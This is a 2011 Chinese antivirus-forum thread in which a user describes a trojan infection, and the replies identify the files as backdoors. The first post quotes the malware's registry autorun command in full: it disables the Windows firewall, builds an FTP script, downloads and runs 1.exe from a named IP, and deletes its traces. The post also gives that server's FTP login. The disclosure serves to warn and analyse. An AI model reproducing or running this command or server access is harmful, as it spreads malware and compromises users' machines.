瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 病毒ftp网址ftp://61.164.117.80/ 用户密码都是123

1   1  /  1  页   跳转

[原创] 病毒ftp网址ftp://61.164.117.80/ 用户密码都是123

病毒ftp网址ftp://61.164.117.80/ 用户密码都是123

昨天上网种了病毒,
发现该病毒会在注册表的开机启动建立一个项:
注册表位置:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\[shell]
注册表内容:c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 61.164.117.80> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1.exe&1.exe&del cmd.txt /q /f&exi
进程:D:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\Binn\sqlservr.exe

在C盘的system32下建立一个isql的文件夹,然后从 61.164.117.80下载木马到isql下
现在用 ftp://61.164.117.80/ 用户密码都是123还可以登录,登录后可以看到木发1.exe,2.exe,4.exe ,lpk.dll

用户系统信息:Opera/9.80 (Windows NT 5.1; U; zh-cn) Presto/2.8.131 Version/11.11
分享到:
gototop
 

回复:病毒ftp网址ftp://61.164.117.80/ 用户密码都是123

楼主强悍。
gototop
 

回复: 病毒ftp网址ftp://61.164.117.80/ 用户密码都是123



引用:
原帖由 tgjxzl 于 2011-6-24 10:02:00 发表
昨天上网种了病毒,
发现该病毒会在注册表的开机启动建立一个项:
注册表位置:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\[shell]
注册表内容:c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 61.164.117.8



两只烂鸽子。其中1.exe还有假冒的数字签名(经不起查看)。
释放的文件为:


1.exe——————C:\SERVER.EXE


360safe——————c:\ programfiles\lsass.exe 


以上两只鸽子均不能在我的WIN7系统中运行


删除了事。









最后编辑baohe 最后编辑于 2011-06-27 17:58:13
gototop
 

回复 1F tgjxzl 的帖子

http://bbs.ikaka.com/showtopic-8987187-3.aspx  楼主中的病毒和我的一样嘛。
gototop
 

回复:病毒ftp网址ftp://61.164.117.80/ 用户密码都是123

FTP登陆不上去。连接被虫豸。
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT